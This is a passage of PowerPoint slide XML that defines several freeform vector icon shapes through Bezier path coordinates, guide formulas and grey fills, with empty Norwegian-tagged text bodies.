                      <a:pt x="325" y="754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 dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="Freeform 1089">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAC1A372-50B8-4D16-BFD7-F112A4314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71213" y="9950450"/>
                <a:ext cx="165100" cy="76200"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 194 w 396"/>
                  <a:gd name="T1" fmla="*/ 182 h 182"/>
                  <a:gd name="T2" fmla="*/ 5 w 396"/>
                  <a:gd name="T3" fmla="*/ 36 h 182"/>
                  <a:gd name="T4" fmla="*/ 18 w 396"/>
                  <a:gd name="T5" fmla="*/ 5 h 182"/>
                  <a:gd name="T6" fmla="*/ 48 w 396"/>
                  <a:gd name="T7" fmla="*/ 18 h 182"/>
                  <a:gd name="T8" fmla="*/ 194 w 396"/>
                  <a:gd name="T9" fmla="*/ 136 h 182"/>
                  <a:gd name="T10" fmla="*/ 348 w 396"/>
                  <a:gd name="T11" fmla="*/ 18 h 182"/>
                  <a:gd name="T12" fmla="*/ 379 w 396"/>
                  <a:gd name="T13" fmla="*/ 6 h 182"/>
                  <a:gd name="T14" fmla="*/ 391 w 396"/>
                  <a:gd name="T15" fmla="*/ 36 h 182"/>
                  <a:gd name="T16" fmla="*/ 194 w 396"/>
                  <a:gd name="T17" fmla="*/ 182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96" h="182">
                    <a:moveTo>
                      <a:pt x="194" y="182"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="182"/>
                      <a:pt x="7" y="42"/>
                      <a:pt x="5" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="24"/>
                      <a:pt x="6" y="10"/>
                      <a:pt x="18" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="1"/>
                      <a:pt x="43" y="6"/>
                      <a:pt x="48" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="19"/>
                      <a:pt x="98" y="136"/>
                      <a:pt x="194" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="295" y="136"/>
                      <a:pt x="348" y="19"/>
                      <a:pt x="348" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="353" y="6"/>
                      <a:pt x="367" y="0"/>
                      <a:pt x="379" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="391" y="11"/>
                      <a:pt x="396" y="24"/>
                      <a:pt x="391" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="388" y="42"/>
                      <a:pt x="326" y="182"/>
                      <a:pt x="194" y="182"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="5555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/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="28" name="Freeform 1090">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{565D7D8A-C425-4A51-8974-267AE9D88E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025188" y="10104438"/>
                <a:ext cx="68263" cy="68263"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 82 w 163"/>
                  <a:gd name="T1" fmla="*/ 163 h 163"/>
                  <a:gd name="T2" fmla="*/ 0 w 163"/>
                  <a:gd name="T3" fmla="*/ 81 h 163"/>
                  <a:gd name="T4" fmla="*/ 82 w 163"/>
                  <a:gd name="T5" fmla="*/ 0 h 163"/>
                  <a:gd name="T6" fmla="*/ 163 w 163"/>
                  <a:gd name="T7" fmla="*/ 81 h 163"/>
                  <a:gd name="T8" fmla="*/ 82 w 163"/>
                  <a:gd name="T9" fmla="*/ 163 h 163"/>
                  <a:gd name="T10" fmla="*/ 82 w 163"/>
                  <a:gd name="T11" fmla="*/ 46 h 163"/>
                  <a:gd name="T12" fmla="*/ 46 w 163"/>
                  <a:gd name="T13" fmla="*/ 81 h 163"/>
                  <a:gd name="T14" fmla="*/ 82 w 163"/>
                  <a:gd name="T15" fmla="*/ 117 h 163"/>
                  <a:gd name="T16" fmla="*/ 117 w 163"/>
                  <a:gd name="T17" fmla="*/ 81 h 163"/>
                  <a:gd name="T18" fmla="*/ 82 w 163"/>
                  <a:gd name="T19" fmla="*/ 46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3" h="163">
                    <a:moveTo>
                      <a:pt x="82" y="163"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="163"/>
                      <a:pt x="0" y="127"/>
                      <a:pt x="0" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="36"/>
                      <a:pt x="36" y="0"/>
                      <a:pt x="82" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="0"/>
                      <a:pt x="163" y="36"/>
                      <a:pt x="163" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="127"/>
                      <a:pt x="127" y="163"/>
                      <a:pt x="82" y="163"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="82" y="46"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="46"/>
                      <a:pt x="46" y="62"/>
                      <a:pt x="46" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="101"/>
                      <a:pt x="62" y="117"/>
                      <a:pt x="82" y="117"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="117"/>
                      <a:pt x="117" y="101"/>
                      <a:pt x="117" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="62"/>
                      <a:pt x="101" y="46"/>
                      <a:pt x="82" y="46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38709" tIns="19354" rIns="38709" bIns="19354" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
                <a:prstTxWarp prst="textNoShape">
                  <a:avLst/>
                </a:prstTxWarp>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="nb-NO" sz="900">
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Freeform 663">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F32D93B3-9FF2-4FFA-852B-9FEA8C6BF343}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9718508" y="4813463"/>
            <a:ext cx="559271" cy="542609"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 407 w 895"/>
              <a:gd name="T1" fmla="*/ 871 h 871"/>
              <a:gd name="T2" fmla="*/ 65 w 895"/>
              <a:gd name="T3" fmla="*/ 540 h 871"/>
              <a:gd name="T4" fmla="*/ 67 w 895"/>
              <a:gd name="T5" fmla="*/ 221 h 871"/>
              <a:gd name="T6" fmla="*/ 397 w 895"/>
              <a:gd name="T7" fmla="*/ 0 h 871"/>
              <a:gd name="T8" fmla="*/ 816 w 895"/>
              <a:gd name="T9" fmla="*/ 17 h 871"/>
              <a:gd name="T10" fmla="*/ 835 w 895"/>
              <a:gd name="T11" fmla="*/ 30 h 871"/>
              <a:gd name="T12" fmla="*/ 749 w 895"/>
              <a:gd name="T13" fmla="*/ 550 h 871"/>
              <a:gd name="T14" fmla="*/ 692 w 895"/>
              <a:gd name="T15" fmla="*/ 731 h 871"/>
              <a:gd name="T16" fmla="*/ 407 w 895"/>
              <a:gd name="T17" fmla="*/ 871 h 871"/>
              <a:gd name="T18" fmla="*/ 397 w 895"/>
              <a:gd name="T19" fmla="*/ 46 h 871"/>
              <a:gd name="T20" fmla="*/ 109 w 895"/>
              <a:gd name="T21" fmla="*/ 242 h 871"/>
              <a:gd name="T22" fmla="*/ 110 w 895"/>
              <a:gd name="T23" fmla="*/ 526 h 871"/>
              <a:gd name="T24" fmla="*/ 111 w 895"/>
              <a:gd name="T25" fmla="*/ 534 h 871"/>
              <a:gd name="T26" fmla="*/ 407 w 895"/>
              <a:gd name="T27" fmla="*/ 824 h 871"/>
              <a:gd name="T28" fmla="*/ 623 w 895"/>
              <a:gd name="T29" fmla="*/ 744 h 871"/>
              <a:gd name="T30" fmla="*/ 703 w 895"/>
              <a:gd name="T31" fmla="*/ 547 h 871"/>
              <a:gd name="T32" fmla="*/ 704 w 895"/>
              <a:gd name="T33" fmla="*/ 536 h 871"/>
              <a:gd name="T34" fmla="*/ 798 w 895"/>
              <a:gd name="T35" fmla="*/ 63 h 871"/>
              <a:gd name="T36" fmla="*/ 397 w 895"/>
              <a:gd name="T37" fmla="*/ 46 h 8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895" h="871">
                <a:moveTo>
                  <a:pt x="407" y="871"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="95" y="871"/>
                  <a:pt x="67" y="580"/>
                  <a:pt x="65" y="540"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="55" y="512"/>
                  <a:pt x="0" y="354"/>
                  <a:pt x="67" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="140" y="78"/>
                  <a:pt x="257" y="0"/>
                  <a:pt x="397" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="527" y="0"/>
                  <a:pt x="813" y="17"/>
                  <a:pt x="816" y="17"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="824" y="18"/>
                  <a:pt x="832" y="23"/>
                  <a:pt x="835" y="30"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="895" y="155"/>
                  <a:pt x="769" y="496"/>
                  <a:pt x="749" y="550"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="749" y="583"/>
                  <a:pt x="737" y="662"/>
                  <a:pt x="692" y="731"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="651" y="795"/>
                  <a:pt x="568" y="871"/>
                  <a:pt x="407" y="871"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="397" y="46"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="273" y="46"/>
                  <a:pt x="174" y="114"/>
                  <a:pt x="109" y="242"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46" y="366"/>
                  <a:pt x="109" y="524"/>
                  <a:pt x="110" y="526"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="111" y="529"/>
                  <a:pt x="111" y="531"/>
                  <a:pt x="111" y="534"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="112" y="546"/>
                  <a:pt x="120" y="824"/>
                  <a:pt x="407" y="824"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="499" y="824"/>
                  <a:pt x="572" y="797"/>
                  <a:pt x="623" y="744"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="699" y="665"/>
                  <a:pt x="703" y="555"/>
                  <a:pt x="703" y="547"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="702" y="544"/>
                  <a:pt x="703" y="540"/>
                  <a:pt x="704" y="536"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="742" y="437"/>
                  <a:pt x="830" y="167"/>
                  <a:pt x="798" y="63"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="738" y="59"/>
                  <a:pt x="509" y="46"/>
                  <a:pt x="397" y="46"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="5555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8709" tIns="19354" rIns="38709" bIns="19354" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Freeform 664">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7C49493-6A44-49B2-A4D4-793FD61FACE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10070730" y="5398910"/>
            <a:ext cx="230848" cy="387919"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 344 w 369"/>
              <a:gd name="T1" fmla="*/ 624 h 624"/>
              <a:gd name="T2" fmla="*/ 321 w 369"/>
              <a:gd name="T3" fmla="*/ 601 h 624"/>
              <a:gd name="T4" fmla="*/ 321 w 369"/>
              <a:gd name="T5" fmla="*/ 297 h 624"/>
              <a:gd name="T6" fmla="*/ 263 w 369"/>
              <a:gd name="T7" fmla="*/ 158 h 624"/>
              <a:gd name="T8" fmla="*/ 18 w 369"/>
              <a:gd name="T9" fmla="*/ 48 h 624"/>
              <a:gd name="T10" fmla="*/ 5 w 369"/>
              <a:gd name="T11" fmla="*/ 17 h 624"/>
              <a:gd name="T12" fmla="*/ 36 w 369"/>
              <a:gd name="T13" fmla="*/ 5 h 624"/>
              <a:gd name="T14" fmla="*/ 285 w 369"/>
              <a:gd name="T15" fmla="*/ 117 h 624"/>
              <a:gd name="T16" fmla="*/ 367 w 369"/>
              <a:gd name="T17" fmla="*/ 298 h 624"/>
              <a:gd name="T18" fmla="*/ 367 w 369"/>
              <a:gd name="T19" fmla="*/ 601 h 624"/>
              <a:gd name="T20" fmla="*/ 344 w 369"/>
              <a:gd name="T21" fmla="*/ 624 h 6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69" h="624">
                <a:moveTo>
                  <a:pt x="344" y="624"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="331" y="624"/>
                  <a:pt x="321" y="614"/>
                  <a:pt x="321" y="601"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="321" y="297"/>
                  <a:pt x="321" y="297"/>
                  <a:pt x="321" y="297"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="321" y="296"/>
                  <a:pt x="322" y="191"/>
                  <a:pt x="263" y="158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="192" y="119"/>
                  <a:pt x="20" y="48"/>
                  <a:pt x="18" y="48"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6" y="43"/>
                  <a:pt x="0" y="29"/>
                  <a:pt x="5" y="17"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10" y="5"/>
                  <a:pt x="24" y="0"/>
                  <a:pt x="36" y="5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="8"/>
                  <a:pt x="212" y="77"/>
                  <a:pt x="285" y="117"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="369" y="164"/>
                  <a:pt x="367" y="293"/>
                  <a:pt x="367" y="298"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="367" y="601"/>
                  <a:pt x="367" y="601"/>
                  <a:pt x="367" y="601"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="367" y="614"/>
                  <a:pt x="357" y="624"/>
                  <a:pt x="344" y="624"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="5555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8709" tIns="19354" rIns="38709" bIns="19354" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Freeform 665">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C6AA521-AD86-4D8C-9DC9-3D293BDE2E77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9847021" y="5296577"/>
            <a:ext cx="254647" cy="218948"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 202 w 410"/>
              <a:gd name="T1" fmla="*/ 350 h 350"/>
              <a:gd name="T2" fmla="*/ 5 w 410"/>
              <a:gd name="T3" fmla="*/ 199 h 350"/>
              <a:gd name="T4" fmla="*/ 17 w 410"/>
              <a:gd name="T5" fmla="*/ 169 h 350"/>
              <a:gd name="T6" fmla="*/ 48 w 410"/>
              <a:gd name="T7" fmla="*/ 181 h 350"/>
              <a:gd name="T8" fmla="*/ 202 w 410"/>
              <a:gd name="T9" fmla="*/ 303 h 350"/>
              <a:gd name="T10" fmla="*/ 364 w 410"/>
              <a:gd name="T11" fmla="*/ 185 h 350"/>
              <a:gd name="T12" fmla="*/ 364 w 410"/>
              <a:gd name="T13" fmla="*/ 24 h 350"/>
              <a:gd name="T14" fmla="*/ 387 w 410"/>
              <a:gd name="T15" fmla="*/ 0 h 350"/>
              <a:gd name="T16" fmla="*/ 410 w 410"/>
              <a:gd name="T17" fmla="*/ 24 h 350"/>
              <a:gd name="T18" fmla="*/ 410 w 410"/>
              <a:gd name="T19" fmla="*/ 190 h 350"/>
              <a:gd name="T20" fmla="*/ 408 w 410"/>
              <a:gd name="T21" fmla="*/ 200 h 350"/>
              <a:gd name="T22" fmla="*/ 202 w 410"/>
              <a:gd name="T23" fmla="*/ 350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0" h="350">
                <a:moveTo>
                  <a:pt x="202" y="350"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="69" y="350"/>
                  <a:pt x="7" y="205"/>
                  <a:pt x="5" y="199"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="187"/>
                  <a:pt x="5" y="174"/>
                  <a:pt x="17" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="164"/>
                  <a:pt x="43" y="169"/>
                  <a:pt x="48" y="181"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="182"/>
                  <a:pt x="100" y="303"/>
                  <a:pt x="202" y="303"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="299" y="303"/>
                  <a:pt x="353" y="206"/>
                  <a:pt x="364" y="185"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="364" y="24"/>
                  <a:pt x="364" y="24"/>
                  <a:pt x="364" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="364" y="11"/>
                  <a:pt x="374" y="0"/>
                  <a:pt x="387" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="400" y="0"/>
                  <a:pt x="410" y="11"/>
                  <a:pt x="410" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="410" y="190"/>
                  <a:pt x="410" y="190"/>
                  <a:pt x="410" y="190"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="410" y="193"/>
                  <a:pt x="409" y="197"/>
                  <a:pt x="408" y="200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="405" y="206"/>
                  <a:pt x="340" y="350"/>
                  <a:pt x="202" y="350"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="5555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8709" tIns="19354" rIns="38709" bIns="19354" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Freeform 666">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F8CD471-E2BC-4821-9559-6F32B7378836}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9899379" y="4946736"/>
            <a:ext cx="192770" cy="69017"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 283 w 309"/>
              <a:gd name="T1" fmla="*/ 110 h 110"/>
              <a:gd name="T2" fmla="*/ 270 w 309"/>
              <a:gd name="T3" fmla="*/ 106 h 110"/>
              <a:gd name="T4" fmla="*/ 24 w 309"/>
              <a:gd name="T5" fmla="*/ 49 h 110"/>
              <a:gd name="T6" fmla="*/ 0 w 309"/>
              <a:gd name="T7" fmla="*/ 27 h 110"/>
              <a:gd name="T8" fmla="*/ 23 w 309"/>
              <a:gd name="T9" fmla="*/ 3 h 110"/>
              <a:gd name="T10" fmla="*/ 295 w 309"/>
              <a:gd name="T11" fmla="*/ 67 h 110"/>
              <a:gd name="T12" fmla="*/ 302 w 309"/>
              <a:gd name="T13" fmla="*/ 99 h 110"/>
              <a:gd name="T14" fmla="*/ 283 w 309"/>
              <a:gd name="T15" fmla="*/ 110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09" h="110">
                <a:moveTo>
                  <a:pt x="283" y="110"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="278" y="110"/>
                  <a:pt x="274" y="109"/>
                  <a:pt x="270" y="106"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="178" y="47"/>
                  <a:pt x="26" y="50"/>
                  <a:pt x="24" y="49"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11" y="50"/>
                  <a:pt x="1" y="39"/>
                  <a:pt x="0" y="27"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14"/>
                  <a:pt x="10" y="3"/>
                  <a:pt x="23" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="30" y="2"/>
                  <a:pt x="192" y="0"/>
                  <a:pt x="295" y="67"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="306" y="74"/>
                  <a:pt x="309" y="88"/>
                  <a:pt x="302" y="99"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="298" y="106"/>
                  <a:pt x="290" y="110"/>
                  <a:pt x="283" y="110"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="5555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8709" tIns="19354" rIns="38709" bIns="19354" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="1050"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Freeform 667">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D8FAF7A-B44E-4EB6-B159-B420B9E6A13F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9654251" y="5301336"/>
            <a:ext cx="226089" cy="485493"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 26 w 366"/>
              <a:gd name="T1" fmla="*/ 780 h 780"/>
              <a:gd name="T2" fmla="*/ 3 w 366"/>
              <a:gd name="T3" fmla="*/ 757 h 780"/>
              <a:gd name="T4" fmla="*/ 3 w 366"/>
              <a:gd name="T5" fmla="*/ 453 h 780"/>
              <a:gd name="T6" fmla="*/ 85 w 366"/>
              <a:gd name="T7" fmla="*/ 273 h 780"/>
              <a:gd name="T8" fmla="*/ 320 w 366"/>
              <a:gd name="T9" fmla="*/ 167 h 780"/>
              <a:gd name="T10" fmla="*/ 320 w 366"/>
              <a:gd name="T11" fmla="*/ 23 h 780"/>
              <a:gd name="T12" fmla="*/ 343 w 366"/>
              <a:gd name="T13" fmla="*/ 0 h 780"/>
              <a:gd name="T14" fmla="*/ 366 w 366"/>
              <a:gd name="T15" fmla="*/ 23 h 780"/>
              <a:gd name="T16" fmla="*/ 366 w 366"/>
              <a:gd name="T17" fmla="*/ 182 h 780"/>
              <a:gd name="T18" fmla="*/ 352 w 366"/>
              <a:gd name="T19" fmla="*/ 204 h 780"/>
              <a:gd name="T20" fmla="*/ 107 w 366"/>
              <a:gd name="T21" fmla="*/ 314 h 780"/>
              <a:gd name="T22" fmla="*/ 49 w 366"/>
              <a:gd name="T23" fmla="*/ 453 h 780"/>
              <a:gd name="T24" fmla="*/ 49 w 366"/>
              <a:gd name="T25" fmla="*/ 757 h 780"/>
              <a:gd name="T26" fmla="*/ 26 w 366"/>
              <a:gd name="T27" fmla="*/ 780 h 7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66" h="780">
                <a:moveTo>
                  <a:pt x="26" y="780"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="13" y="780"/>
                  <a:pt x="3" y="770"/>
                  <a:pt x="3" y="757"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3" y="453"/>
                  <a:pt x="3" y="453"/>
                  <a:pt x="3" y="453"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3" y="449"/>
                  <a:pt x="0" y="320"/>
                  <a:pt x="85" y="273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="146" y="240"/>
                  <a:pt x="276" y="185"/>
                  <a:pt x="320" y="167"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="320" y="23"/>
                  <a:pt x="320" y="23"/>
                  <a:pt x="320" y="23"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="320" y="10"/>
                  <a:pt x="330" y="0"/>
                  <a:pt x="343" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="356" y="0"/>
                  <a:pt x="366" y="10"/>
                  <a:pt x="366" y="23"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="366" y="182"/>
                  <a:pt x="366" y="182"/>
                  <a:pt x="366" y="182"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="366" y="192"/>
                  <a:pt x="361" y="200"/>
                  <a:pt x="352" y="204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="350" y="204"/>
                  <a:pt x="178" y="275"/>
                  <a:pt x="107" y="314"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="347"/>
                  <a:pt x="49" y="452"/>
                  <a:pt x="49" y="453"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="757"/>
                  <a:pt x="49" y="757"/>
                  <a:pt x="49" y="757"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="770"/>
                  <a:pt x="39" y="780"/>
                  <a:pt x="26" y="780"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="5555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38709" tIns="19354" rIns="38709" bIns="19354" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="90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88D9C0CB-7415-427D-88C4-E7A1447ACB91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
